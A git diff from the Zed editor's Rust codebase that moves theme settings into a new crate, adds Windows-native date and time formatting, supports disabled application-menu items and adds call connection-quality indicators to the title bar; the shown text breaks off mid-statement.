100644 --- a/crates/theme/src/settings.rs +++ b/crates/theme_settings/src/settings.rs @@ -1,9 +1,8 @@ -use crate::{ - Appearance, DEFAULT_ICON_THEME_NAME, SyntaxTheme, Theme, status_colors_refinement, - syntax_overrides, theme_colors_refinement, -}; +#![allow(missing_docs)] + +use crate::schema::{status_colors_refinement, syntax_overrides, theme_colors_refinement}; +use crate::{merge_accent_colors, merge_player_colors}; use collections::HashMap; -use derive_more::{Deref, DerefMut}; use gpui::{ App, Context, Font, FontFallbacks, FontStyle, Global, Pixels, Subscription, Window, px, }; @@ -13,82 +12,24 @@ use serde::{Deserialize, Serialize}; pub use settings::{FontFamilyName, IconThemeName, ThemeAppearanceMode, ThemeName}; use settings::{IntoGpui, RegisterSetting, Settings, SettingsContent}; use std::sync::Arc; +use theme::{Appearance, DEFAULT_ICON_THEME_NAME, SyntaxTheme, Theme, UiDensity}; const MIN_FONT_SIZE: Pixels = px(6.0); const MAX_FONT_SIZE: Pixels = px(100.0); const MIN_LINE_HEIGHT: f32 = 1.0; -#[derive( - Debug, - Default, - PartialEq, - Eq, - PartialOrd, - Ord, - Hash, - Clone, - Copy, - Serialize, - Deserialize, - JsonSchema, -)] - -/// Specifies the density of the UI. -/// Note: This setting is still experimental. See [this tracking issue](https://github.com/zed-industries/zed/issues/18078) -#[serde(rename_all = "snake_case")] -pub enum UiDensity { - /// A denser UI with tighter spacing and smaller elements. - #[serde(alias = "compact")] - Compact, - #[default] - #[serde(alias = "default")] - /// The default UI density. - Default, - #[serde(alias = "comfortable")] - /// A looser UI with more spacing and larger elements. - Comfortable, -} - -impl UiDensity { - /// The spacing ratio of a given density. 
- /// TODO: Standardize usage throughout the app or remove - pub fn spacing_ratio(self) -> f32 { - match self { - UiDensity::Compact => 0.75, - UiDensity::Default => 1.0, - UiDensity::Comfortable => 1.25, - } - } -} - -impl From for UiDensity { - fn from(s: String) -> Self { - match s.as_str() { - "compact" => Self::Compact, - "default" => Self::Default, - "comfortable" => Self::Comfortable, - _ => Self::default(), - } - } -} - -impl From for String { - fn from(val: UiDensity) -> Self { - match val { - UiDensity::Compact => "compact".to_string(), - UiDensity::Default => "default".to_string(), - UiDensity::Comfortable => "comfortable".to_string(), - } +pub(crate) fn ui_density_from_settings(val: settings::UiDensity) -> UiDensity { + match val { + settings::UiDensity::Compact => UiDensity::Compact, + settings::UiDensity::Default => UiDensity::Default, + settings::UiDensity::Comfortable => UiDensity::Comfortable, } } -impl From for UiDensity { - fn from(val: settings::UiDensity) -> Self { - match val { - settings::UiDensity::Compact => Self::Compact, - settings::UiDensity::Default => Self::Default, - settings::UiDensity::Comfortable => Self::Comfortable, - } +pub fn appearance_to_mode(appearance: Appearance) -> ThemeAppearanceMode { + match appearance { + Appearance::Light => ThemeAppearanceMode::Light, + Appearance::Dark => ThemeAppearanceMode::Dark, } } @@ -145,39 +86,6 @@ pub fn default_theme(appearance: Appearance) -> &'static str { } } -/// The appearance of the system. -#[derive(Debug, Clone, Copy, Deref)] -pub struct SystemAppearance(pub Appearance); - -impl Default for SystemAppearance { - fn default() -> Self { - Self(Appearance::Dark) - } -} - -#[derive(Deref, DerefMut, Default)] -struct GlobalSystemAppearance(SystemAppearance); - -impl Global for GlobalSystemAppearance {} - -impl SystemAppearance { - /// Initializes the [`SystemAppearance`] for the application. 
- pub fn init(cx: &mut App) { - *cx.default_global::() = - GlobalSystemAppearance(SystemAppearance(cx.window_appearance().into())); - } - - /// Returns the global [`SystemAppearance`]. - pub fn global(cx: &App) -> Self { - cx.global::().0 - } - - /// Returns a mutable reference to the global [`SystemAppearance`]. - pub fn global_mut(cx: &mut App) -> &mut Self { - cx.global_mut::() - } -} - #[derive(Default)] struct BufferFontSize(Pixels); @@ -327,21 +235,16 @@ pub fn set_theme( *theme = theme_name; } settings::ThemeSelection::Dynamic { mode, light, dark } => { - // Update the appropriate theme slot based on appearance. match theme_appearance { Appearance::Light => *light = theme_name, Appearance::Dark => *dark = theme_name, } - // Don't update the theme mode if it is set to system and the new theme has the same - // appearance. let should_update_mode = !(mode == &ThemeAppearanceMode::System && theme_appearance == system_appearance); if should_update_mode { - // Update the mode to the specified appearance (otherwise we might set the theme and - // nothing gets updated because the system specified the other mode appearance). - *mode = ThemeAppearanceMode::from(theme_appearance); + *mode = appearance_to_mode(theme_appearance); } } } @@ -378,14 +281,11 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) { if let Some(selection) = theme.theme.as_mut() { match selection { - settings::ThemeSelection::Static(theme) => { - // If the theme was previously set to a single static theme, - // we don't know whether it was a light or dark theme, so we - // just use it for both. 
+ settings::ThemeSelection::Static(_) => { *selection = settings::ThemeSelection::Dynamic { - mode, - light: theme.clone(), - dark: theme.clone(), + mode: ThemeAppearanceMode::System, + light: ThemeName(settings::DEFAULT_LIGHT_THEME.into()), + dark: ThemeName(settings::DEFAULT_DARK_THEME.into()), }; } settings::ThemeSelection::Dynamic { @@ -404,9 +304,6 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) { if let Some(selection) = theme.icon_theme.as_mut() { match selection { settings::IconThemeSelection::Static(icon_theme) => { - // If the icon theme was previously set to a single static - // theme, we don't know whether it was a light or dark - // theme, so we just use it for both. *selection = settings::IconThemeSelection::Dynamic { mode, light: icon_theme.clone(), @@ -424,7 +321,6 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) { ))); } } -// } /// The buffer's line height. #[derive(Clone, Copy, Debug, PartialEq, Default)] @@ -530,7 +426,6 @@ impl ThemeSettings { self.agent_buffer_font_size } - // TODO: Rename: `line_height` -> `buffer_line_height` /// Returns the buffer's line height. pub fn line_height(&self) -> f32 { f32::max(self.buffer_line_height.value(), MIN_LINE_HEIGHT) @@ -538,7 +433,6 @@ impl ThemeSettings { /// Applies the theme overrides, if there are any, to the current theme. pub fn apply_theme_overrides(&self, mut arc_theme: Arc) -> Arc { - // Apply the old overrides setting first, so that the new setting can override those. 
if let Some(experimental_theme_overrides) = &self.experimental_theme_overrides { let mut theme = (*arc_theme).clone(); ThemeSettings::modify_theme(&mut theme, experimental_theme_overrides); @@ -566,11 +460,11 @@ impl ThemeSettings { &status_color_refinement, )); base_theme.styles.status.refine(&status_color_refinement); - base_theme.styles.player.merge(&theme_overrides.players); - base_theme.styles.accents.merge(&theme_overrides.accents); + merge_player_colors(&mut base_theme.styles.player, &theme_overrides.players); + merge_accent_colors(&mut base_theme.styles.accents, &theme_overrides.accents); base_theme.styles.syntax = SyntaxTheme::merge( base_theme.styles.syntax.clone(), - syntax_overrides(&theme_overrides), + syntax_overrides(theme_overrides), ); } } @@ -614,7 +508,6 @@ pub fn reset_buffer_font_size(cx: &mut App) { } } -// TODO: Make private, change usages to use `get_ui_font_size` instead. #[allow(missing_docs)] pub fn setup_ui_font(window: &mut Window, cx: &mut App) -> gpui::Font { let (ui_font, ui_font_size) = { @@ -734,7 +627,7 @@ impl settings::Settings for ThemeSettings { experimental_theme_overrides: content.experimental_theme_overrides.clone(), theme_overrides: content.theme_overrides.clone(), icon_theme: icon_theme_selection, - ui_density: content.ui_density.unwrap_or_default().into(), + ui_density: ui_density_from_settings(content.ui_density.unwrap_or_default()), unnecessary_code_fade: content.unnecessary_code_fade.unwrap().0.clamp(0.0, 0.9), } } diff --git a/crates/theme_settings/src/theme_settings.rs b/crates/theme_settings/src/theme_settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..f5bc96ba02a63088b6311055899b39de65ea9de2 --- /dev/null +++ b/crates/theme_settings/src/theme_settings.rs @@ -0,0 +1,412 @@ +#![deny(missing_docs)] + +//! # Theme Settings +//! +//! This crate provides theme settings integration for Zed, +//! bridging the theme system with the settings infrastructure. 
+ +mod schema; +mod settings; + +use std::sync::Arc; + +use ::settings::{IntoGpui, Settings, SettingsStore}; +use anyhow::{Context as _, Result}; +use gpui::{App, Font, HighlightStyle, Pixels, Refineable}; +use gpui_util::ResultExt; +use theme::{ + AccentColors, Appearance, AppearanceContent, DEFAULT_DARK_THEME, DEFAULT_ICON_THEME_NAME, + GlobalTheme, LoadThemes, PlayerColor, PlayerColors, StatusColors, SyntaxTheme, + SystemAppearance, SystemColors, Theme, ThemeColors, ThemeFamily, ThemeRegistry, + ThemeSettingsProvider, ThemeStyles, default_color_scales, try_parse_color, +}; + +pub use crate::schema::{ + FontStyleContent, FontWeightContent, HighlightStyleContent, StatusColorsContent, + ThemeColorsContent, ThemeContent, ThemeFamilyContent, ThemeStyleContent, + WindowBackgroundContent, status_colors_refinement, syntax_overrides, theme_colors_refinement, +}; +pub use crate::settings::{ + AgentFontSize, BufferLineHeight, FontFamilyName, IconThemeName, IconThemeSelection, + ThemeAppearanceMode, ThemeName, ThemeSelection, ThemeSettings, adjust_agent_buffer_font_size, + adjust_agent_ui_font_size, adjust_buffer_font_size, adjust_ui_font_size, adjusted_font_size, + appearance_to_mode, clamp_font_size, default_theme, observe_buffer_font_size_adjustment, + reset_agent_buffer_font_size, reset_agent_ui_font_size, reset_buffer_font_size, + reset_ui_font_size, set_icon_theme, set_mode, set_theme, setup_ui_font, +}; +pub use theme::UiDensity; + +struct ThemeSettingsProviderImpl; + +impl ThemeSettingsProvider for ThemeSettingsProviderImpl { + fn ui_font<'a>(&'a self, cx: &'a App) -> &'a Font { + &ThemeSettings::get_global(cx).ui_font + } + + fn buffer_font<'a>(&'a self, cx: &'a App) -> &'a Font { + &ThemeSettings::get_global(cx).buffer_font + } + + fn ui_font_size(&self, cx: &App) -> Pixels { + ThemeSettings::get_global(cx).ui_font_size(cx) + } + + fn buffer_font_size(&self, cx: &App) -> Pixels { + ThemeSettings::get_global(cx).buffer_font_size(cx) + } + + fn ui_density(&self, cx: 
&App) -> UiDensity { + ThemeSettings::get_global(cx).ui_density + } +} + +/// Initialize the theme system with settings integration. +/// +/// This is the full initialization for the application. It calls [`theme::init`] +/// and then wires up settings observation for theme/font changes. +pub fn init(themes_to_load: LoadThemes, cx: &mut App) { + let load_user_themes = matches!(&themes_to_load, LoadThemes::All(_)); + + theme::init(themes_to_load, cx); + theme::set_theme_settings_provider(Box::new(ThemeSettingsProviderImpl), cx); + + if load_user_themes { + let registry = ThemeRegistry::global(cx); + load_bundled_themes(®istry); + } + + let theme = configured_theme(cx); + let icon_theme = configured_icon_theme(cx); + GlobalTheme::update_theme(cx, theme); + GlobalTheme::update_icon_theme(cx, icon_theme); + + let settings = ThemeSettings::get_global(cx); + + let mut prev_buffer_font_size_settings = settings.buffer_font_size_settings(); + let mut prev_ui_font_size_settings = settings.ui_font_size_settings(); + let mut prev_agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); + let mut prev_agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); + let mut prev_theme_name = settings.theme.name(SystemAppearance::global(cx).0); + let mut prev_icon_theme_name = settings.icon_theme.name(SystemAppearance::global(cx).0); + let mut prev_theme_overrides = ( + settings.experimental_theme_overrides.clone(), + settings.theme_overrides.clone(), + ); + + cx.observe_global::(move |cx| { + let settings = ThemeSettings::get_global(cx); + + let buffer_font_size_settings = settings.buffer_font_size_settings(); + let ui_font_size_settings = settings.ui_font_size_settings(); + let agent_ui_font_size_settings = settings.agent_ui_font_size_settings(); + let agent_buffer_font_size_settings = settings.agent_buffer_font_size_settings(); + let theme_name = settings.theme.name(SystemAppearance::global(cx).0); + let icon_theme_name = 
settings.icon_theme.name(SystemAppearance::global(cx).0); + let theme_overrides = ( + settings.experimental_theme_overrides.clone(), + settings.theme_overrides.clone(), + ); + + if buffer_font_size_settings != prev_buffer_font_size_settings { + prev_buffer_font_size_settings = buffer_font_size_settings; + reset_buffer_font_size(cx); + } + + if ui_font_size_settings != prev_ui_font_size_settings { + prev_ui_font_size_settings = ui_font_size_settings; + reset_ui_font_size(cx); + } + + if agent_ui_font_size_settings != prev_agent_ui_font_size_settings { + prev_agent_ui_font_size_settings = agent_ui_font_size_settings; + reset_agent_ui_font_size(cx); + } + + if agent_buffer_font_size_settings != prev_agent_buffer_font_size_settings { + prev_agent_buffer_font_size_settings = agent_buffer_font_size_settings; + reset_agent_buffer_font_size(cx); + } + + if theme_name != prev_theme_name || theme_overrides != prev_theme_overrides { + prev_theme_name = theme_name; + prev_theme_overrides = theme_overrides; + reload_theme(cx); + } + + if icon_theme_name != prev_icon_theme_name { + prev_icon_theme_name = icon_theme_name; + reload_icon_theme(cx); + } + }) + .detach(); +} + +fn configured_theme(cx: &mut App) -> Arc { + let themes = ThemeRegistry::default_global(cx); + let theme_settings = ThemeSettings::get_global(cx); + let system_appearance = SystemAppearance::global(cx); + + let theme_name = theme_settings.theme.name(*system_appearance); + + let theme = match themes.get(&theme_name.0) { + Ok(theme) => theme, + Err(err) => { + if themes.extensions_loaded() { + log::error!("{err}"); + } + themes + .get(default_theme(*system_appearance)) + .unwrap_or_else(|_| themes.get(DEFAULT_DARK_THEME).unwrap()) + } + }; + theme_settings.apply_theme_overrides(theme) +} + +fn configured_icon_theme(cx: &mut App) -> Arc { + let themes = ThemeRegistry::default_global(cx); + let theme_settings = ThemeSettings::get_global(cx); + let system_appearance = SystemAppearance::global(cx); + + let 
icon_theme_name = theme_settings.icon_theme.name(*system_appearance); + + match themes.get_icon_theme(&icon_theme_name.0) { + Ok(theme) => theme, + Err(err) => { + if themes.extensions_loaded() { + log::error!("{err}"); + } + themes.get_icon_theme(DEFAULT_ICON_THEME_NAME).unwrap() + } + } +} + +/// Reloads the current theme from settings. +pub fn reload_theme(cx: &mut App) { + let theme = configured_theme(cx); + GlobalTheme::update_theme(cx, theme); + cx.refresh_windows(); +} + +/// Reloads the current icon theme from settings. +pub fn reload_icon_theme(cx: &mut App) { + let icon_theme = configured_icon_theme(cx); + GlobalTheme::update_icon_theme(cx, icon_theme); + cx.refresh_windows(); +} + +/// Loads the themes bundled with the Zed binary into the registry. +pub fn load_bundled_themes(registry: &ThemeRegistry) { + let theme_paths = registry + .assets() + .list("themes/") + .expect("failed to list theme assets") + .into_iter() + .filter(|path| path.ends_with(".json")); + + for path in theme_paths { + let Some(theme) = registry.assets().load(&path).log_err().flatten() else { + continue; + }; + + let Some(theme_family) = serde_json::from_slice(&theme) + .with_context(|| format!("failed to parse theme at path \"{path}\"")) + .log_err() + else { + continue; + }; + + let refined = refine_theme_family(theme_family); + registry.insert_theme_families([refined]); + } +} + +/// Loads a user theme from the given bytes into the registry. +pub fn load_user_theme(registry: &ThemeRegistry, bytes: &[u8]) -> Result<()> { + let theme = deserialize_user_theme(bytes)?; + let refined = refine_theme_family(theme); + registry.insert_theme_families([refined]); + Ok(()) +} + +/// Deserializes a user theme from the given bytes. 
+pub fn deserialize_user_theme(bytes: &[u8]) -> Result { + let theme_family: ThemeFamilyContent = serde_json_lenient::from_slice(bytes)?; + + for theme in &theme_family.themes { + if theme + .style + .colors + .deprecated_scrollbar_thumb_background + .is_some() + { + log::warn!( + r#"Theme "{theme_name}" is using a deprecated style property: scrollbar_thumb.background. Use `scrollbar.thumb.background` instead."#, + theme_name = theme.name + ) + } + } + + Ok(theme_family) +} + +/// Refines a [`ThemeFamilyContent`] and its [`ThemeContent`]s into a [`ThemeFamily`]. +pub fn refine_theme_family(theme_family_content: ThemeFamilyContent) -> ThemeFamily { + let id = uuid::Uuid::new_v4().to_string(); + let name = theme_family_content.name.clone(); + let author = theme_family_content.author.clone(); + + let themes: Vec = theme_family_content + .themes + .iter() + .map(|theme_content| refine_theme(theme_content)) + .collect(); + + ThemeFamily { + id, + name: name.into(), + author: author.into(), + themes, + scales: default_color_scales(), + } +} + +/// Refines a [`ThemeContent`] into a [`Theme`]. 
+pub fn refine_theme(theme: &ThemeContent) -> Theme { + let appearance = match theme.appearance { + AppearanceContent::Light => Appearance::Light, + AppearanceContent::Dark => Appearance::Dark, + }; + + let mut refined_status_colors = match theme.appearance { + AppearanceContent::Light => StatusColors::light(), + AppearanceContent::Dark => StatusColors::dark(), + }; + let mut status_colors_refinement = status_colors_refinement(&theme.style.status); + theme::apply_status_color_defaults(&mut status_colors_refinement); + refined_status_colors.refine(&status_colors_refinement); + + let mut refined_player_colors = match theme.appearance { + AppearanceContent::Light => PlayerColors::light(), + AppearanceContent::Dark => PlayerColors::dark(), + }; + merge_player_colors(&mut refined_player_colors, &theme.style.players); + + let mut refined_theme_colors = match theme.appearance { + AppearanceContent::Light => ThemeColors::light(), + AppearanceContent::Dark => ThemeColors::dark(), + }; + let mut theme_colors_refinement = + theme_colors_refinement(&theme.style.colors, &status_colors_refinement); + theme::apply_theme_color_defaults(&mut theme_colors_refinement, &refined_player_colors); + refined_theme_colors.refine(&theme_colors_refinement); + + let mut refined_accent_colors = match theme.appearance { + AppearanceContent::Light => AccentColors::light(), + AppearanceContent::Dark => AccentColors::dark(), + }; + merge_accent_colors(&mut refined_accent_colors, &theme.style.accents); + + let syntax_highlights = theme.style.syntax.iter().map(|(syntax_token, highlight)| { + ( + syntax_token.clone(), + HighlightStyle { + color: highlight + .color + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + background_color: highlight + .background_color + .as_ref() + .and_then(|color| try_parse_color(color).ok()), + font_style: highlight.font_style.map(|s| s.into_gpui()), + font_weight: highlight.font_weight.map(|w| w.into_gpui()), + ..Default::default() + }, + ) + }); + let 
syntax_theme = Arc::new(SyntaxTheme::new(syntax_highlights)); + + let window_background_appearance = theme + .style + .window_background_appearance + .map(|w| w.into_gpui()) + .unwrap_or_default(); + + Theme { + id: uuid::Uuid::new_v4().to_string(), + name: theme.name.clone().into(), + appearance, + styles: ThemeStyles { + system: SystemColors::default(), + window_background_appearance, + accents: refined_accent_colors, + colors: refined_theme_colors, + status: refined_status_colors, + player: refined_player_colors, + syntax: syntax_theme, + }, + } +} + +/// Merges player color overrides into the given [`PlayerColors`]. +pub fn merge_player_colors( + player_colors: &mut PlayerColors, + user_player_colors: &[::settings::PlayerColorContent], +) { + if user_player_colors.is_empty() { + return; + } + + for (idx, player) in user_player_colors.iter().enumerate() { + let cursor = player + .cursor + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let background = player + .background + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + let selection = player + .selection + .as_ref() + .and_then(|color| try_parse_color(color).ok()); + + if let Some(player_color) = player_colors.0.get_mut(idx) { + *player_color = PlayerColor { + cursor: cursor.unwrap_or(player_color.cursor), + background: background.unwrap_or(player_color.background), + selection: selection.unwrap_or(player_color.selection), + }; + } else { + player_colors.0.push(PlayerColor { + cursor: cursor.unwrap_or_default(), + background: background.unwrap_or_default(), + selection: selection.unwrap_or_default(), + }); + } + } +} + +/// Merges accent color overrides into the given [`AccentColors`]. 
+pub fn merge_accent_colors( + accent_colors: &mut AccentColors, + user_accent_colors: &[::settings::AccentContent], +) { + if user_accent_colors.is_empty() { + return; + } + + let colors = user_accent_colors + .iter() + .filter_map(|accent_color| { + accent_color + .0 + .as_ref() + .and_then(|color| try_parse_color(color).ok()) + }) + .collect::>(); + + if !colors.is_empty() { + accent_colors.0 = Arc::from(colors); + } +} diff --git a/crates/time_format/Cargo.toml b/crates/time_format/Cargo.toml index b598d19887e128a0c5951c1d1bd5ec42f27f975b..7f5f2d9f1b56666036816d43bfa3564bf9721f05 100644 --- a/crates/time_format/Cargo.toml +++ b/crates/time_format/Cargo.toml @@ -19,3 +19,6 @@ time.workspace = true [target.'cfg(target_os = "macos")'.dependencies] core-foundation.workspace = true core-foundation-sys.workspace = true + +[target.'cfg(target_os = "windows")'.dependencies] +windows.workspace = true diff --git a/crates/time_format/src/time_format.rs b/crates/time_format/src/time_format.rs index 25a7ae84232b69570e8c800c5955e684a13dc08a..bbf214623eb4b5b9dd978a675551c25f5e937a8d 100644 --- a/crates/time_format/src/time_format.rs +++ b/crates/time_format/src/time_format.rs @@ -86,10 +86,25 @@ fn format_absolute_date( macos::format_date(×tamp) } } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + if !enhanced_date_formatting { + return windows::format_date(×tamp); + } + + let timestamp_date = timestamp.date(); + let reference_date = reference.date(); + if timestamp_date == reference_date { + "Today".to_string() + } else if reference_date.previous_day() == Some(timestamp_date) { + "Yesterday".to_string() + } else { + windows::format_date(×tamp) + } + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| String::from("en-US"))); 
format_timestamp_naive_date( @@ -105,10 +120,13 @@ fn format_absolute_time(timestamp: OffsetDateTime) -> String { { macos::format_time(×tamp) } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + windows::format_time(×tamp) + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| String::from("en-US"))); format_timestamp_naive_time( @@ -123,7 +141,7 @@ fn format_absolute_timestamp( reference: OffsetDateTime, #[allow(unused_variables)] enhanced_date_formatting: bool, ) -> String { - #[cfg(target_os = "macos")] + #[cfg(any(target_os = "macos", target_os = "windows"))] { if !enhanced_date_formatting { return format!( @@ -147,10 +165,9 @@ fn format_absolute_timestamp( ) } } - #[cfg(not(target_os = "macos"))] + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences format_timestamp_fallback(timestamp, reference) } } @@ -176,10 +193,25 @@ fn format_absolute_date_medium( macos::format_date_medium(×tamp) } } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + if !enhanced_formatting { + return windows::format_date_medium(×tamp); + } + + let timestamp_date = timestamp.date(); + let reference_date = reference.date(); + if timestamp_date == reference_date { + "Today".to_string() + } else if reference_date.previous_day() == Some(timestamp_date) { + "Yesterday".to_string() + } else { + windows::format_date_medium(×tamp) + } + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences - // todo(windows) respect user's date/time preferences let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| 
String::from("en-US"))); if !enhanced_formatting { @@ -212,7 +244,11 @@ fn format_absolute_timestamp_medium( { format_absolute_date_medium(timestamp, reference, false) } - #[cfg(not(target_os = "macos"))] + #[cfg(target_os = "windows")] + { + format_absolute_date_medium(timestamp, reference, false) + } + #[cfg(not(any(target_os = "macos", target_os = "windows")))] { // todo(linux) respect user's date/time preferences // todo(windows) respect user's date/time preferences @@ -360,7 +396,7 @@ fn format_timestamp_naive_date( } } -#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] fn format_timestamp_naive_date_medium( timestamp_local: OffsetDateTime, is_12_hour_time: bool, @@ -415,10 +451,10 @@ pub fn format_timestamp_naive( } } -#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] static CURRENT_LOCALE: std::sync::OnceLock = std::sync::OnceLock::new(); -#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] fn format_timestamp_fallback(timestamp: OffsetDateTime, reference: OffsetDateTime) -> String { let current_locale = CURRENT_LOCALE .get_or_init(|| sys_locale::get_locale().unwrap_or_else(|| String::from("en-US"))); @@ -428,7 +464,7 @@ fn format_timestamp_fallback(timestamp: OffsetDateTime, reference: OffsetDateTim } /// Returns `true` if the locale is recognized as a 12-hour time locale. 
-#[cfg(not(target_os = "macos"))] +#[cfg(not(any(target_os = "macos", target_os = "windows")))] fn is_12_hour_time_by_locale(locale: &str) -> bool { [ "es-MX", "es-CO", "es-SV", "es-NI", @@ -522,6 +558,57 @@ mod macos { } } +#[cfg(target_os = "windows")] +mod windows { + use windows::Globalization::DateTimeFormatting::DateTimeFormatter; + + pub fn format_time(timestamp: &time::OffsetDateTime) -> String { + format_with_formatter(DateTimeFormatter::ShortTime(), timestamp, true) + } + + pub fn format_date(timestamp: &time::OffsetDateTime) -> String { + format_with_formatter(DateTimeFormatter::ShortDate(), timestamp, false) + } + + pub fn format_date_medium(timestamp: &time::OffsetDateTime) -> String { + format_with_formatter( + DateTimeFormatter::CreateDateTimeFormatter(windows::core::h!( + "month.abbreviated day year.full" + )), + timestamp, + false, + ) + } + + fn format_with_formatter( + formatter: windows::core::Result, + timestamp: &time::OffsetDateTime, + is_time: bool, + ) -> String { + formatter + .and_then(|formatter| formatter.Format(to_winrt_datetime(timestamp))) + .map(|hstring| hstring.to_string()) + .unwrap_or_else(|_| { + if is_time { + super::format_timestamp_naive_time(*timestamp, true) + } else { + super::format_timestamp_naive_date(*timestamp, *timestamp, true) + } + }) + } + + fn to_winrt_datetime(timestamp: &time::OffsetDateTime) -> windows::Foundation::DateTime { + // DateTime uses 100-nanosecond intervals since January 1, 1601 (UTC). 
+ const WINDOWS_EPOCH: time::OffsetDateTime = time::macros::datetime!(1601-01-01 0:00 UTC); + let duration_since_winrt_epoch = *timestamp - WINDOWS_EPOCH; + let universal_time = duration_since_winrt_epoch.whole_nanoseconds() / 100; + + windows::Foundation::DateTime { + UniversalTime: universal_time as i64, + } + } +} + #[cfg(test)] mod tests { use super::*; diff --git a/crates/title_bar/Cargo.toml b/crates/title_bar/Cargo.toml index a9988d498e463edb463175ec19867fa6624479e5..ef59ada28baa878d2cfc37ba52b4912e261274e8 100644 --- a/crates/title_bar/Cargo.toml +++ b/crates/title_bar/Cargo.toml @@ -18,9 +18,9 @@ stories = ["dep:story"] test-support = [ "call/test-support", "client/test-support", - "collections/test-support", + "gpui/test-support", - "http_client/test-support", + "project/test-support", "remote/test-support", "util/test-support", @@ -38,13 +38,15 @@ chrono.workspace = true client.workspace = true cloud_api_types.workspace = true db.workspace = true -feature_flags.workspace = true git_ui.workspace = true gpui = { workspace = true, features = ["screen-capture"] } +icons.workspace = true +livekit_client.workspace = true notifications.workspace = true project.workspace = true recent_projects.workspace = true remote.workspace = true +remote_connection.workspace = true rpc.workspace = true semver.workspace = true schemars.workspace = true @@ -65,17 +67,13 @@ windows.workspace = true [dev-dependencies] call = { workspace = true, features = ["test-support"] } client = { workspace = true, features = ["test-support"] } -collections = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } -http_client = { workspace = true, features = ["test-support"] } notifications = { workspace = true, features = ["test-support"] } -pretty_assertions.workspace = true project = { workspace = true, features = ["test-support"] } release_channel.workspace = true remote = { workspace = true, features = ["test-support"] } rpc = { 
workspace = true, features = ["test-support"] } semver.workspace = true settings = { workspace = true, features = ["test-support"] } -tree-sitter-md.workspace = true util = { workspace = true, features = ["test-support"] } workspace = { workspace = true, features = ["test-support"] } diff --git a/crates/title_bar/src/application_menu.rs b/crates/title_bar/src/application_menu.rs index 579e4dadbd590981a4aee15019bbe73e2bb28d5c..b5cb07f757fe6b4fa26df7cc0f875025a0c08a81 100644 --- a/crates/title_bar/src/application_menu.rs +++ b/crates/title_bar/src/application_menu.rs @@ -114,8 +114,9 @@ impl ApplicationMenu { name, action, checked, + disabled, .. - } => menu.action_checked(name, action, checked), + } => menu.action_checked_with_disabled(name, action, checked, disabled), OwnedMenuItem::Submenu(submenu) => { submenu .items @@ -126,8 +127,10 @@ impl ApplicationMenu { name, action, checked, + disabled, .. - } => menu.action_checked(name, action, checked), + } => menu + .action_checked_with_disabled(name, action, checked, disabled), OwnedMenuItem::Submenu(_) => menu, OwnedMenuItem::SystemMenu(_) => { // A system menu doesn't make sense in this context, so ignore it diff --git a/crates/title_bar/src/collab.rs b/crates/title_bar/src/collab.rs index 0f4d5977947fa27cf3ca5811dbf883c4dbd9df94..474d0d287e47dcc6aad0b0f5c57fce382ebf2ca9 100644 --- a/crates/title_bar/src/collab.rs +++ b/crates/title_bar/src/collab.rs @@ -9,7 +9,10 @@ use gpui::{ canvas, point, }; use gpui::{App, Task, Window}; +use icons::IconName; +use livekit_client::ConnectionQuality; use project::WorktreeSettings; +use remote_connection::RemoteConnectionModal; use rpc::proto::{self}; use settings::{Settings as _, SettingsLocation}; use theme::ActiveTheme; @@ -19,9 +22,17 @@ use ui::{ }; use util::rel_path::RelPath; use workspace::{ParticipantLocation, notifications::DetachAndPromptErr}; +use zed_actions::ShowCallStats; use crate::TitleBar; +fn format_stat(value: Option, format: impl Fn(f64) -> String) -> String 
{ + match value { + Some(v) => format(v), + None => "—".to_string(), + } +} + pub fn toggle_screen_sharing( screen: anyhow::Result>>, window: &mut Window, @@ -332,7 +343,11 @@ impl TitleBar { let is_connecting_to_project = self .workspace - .update(cx, |workspace, cx| workspace.has_active_modal(window, cx)) + .update(cx, |workspace, cx| { + workspace + .active_modal::(cx) + .is_some() + }) .unwrap_or(false); let room = room.read(cx); @@ -347,6 +362,11 @@ impl TitleBar { let can_share_projects = room.can_share_projects(); let screen_sharing_supported = cx.is_screen_capture_supported(); + let stats = room + .diagnostics() + .map(|d| d.read(cx).stats().clone()) + .unwrap_or_default(); + let channel_store = ChannelStore::global(cx); let channel = room .channel_id() @@ -354,6 +374,18 @@ impl TitleBar { let mut children = Vec::new(); + let effective_quality = stats.effective_quality.unwrap_or(ConnectionQuality::Lost); + let (signal_icon, signal_color, quality_label) = match effective_quality { + ConnectionQuality::Excellent => { + (IconName::SignalHigh, Some(Color::Success), "Excellent") + } + ConnectionQuality::Good => (IconName::SignalHigh, None, "Good"), + ConnectionQuality::Poor => (IconName::SignalMedium, Some(Color::Warning), "Poor"), + ConnectionQuality::Lost => (IconName::SignalLow, Some(Color::Error), "Lost"), + }; + + let quality_label: SharedString = quality_label.into(); + children.push( h_flex() .gap_1() @@ -372,6 +404,35 @@ impl TitleBar { .into_any_element(), ); + children.push( + 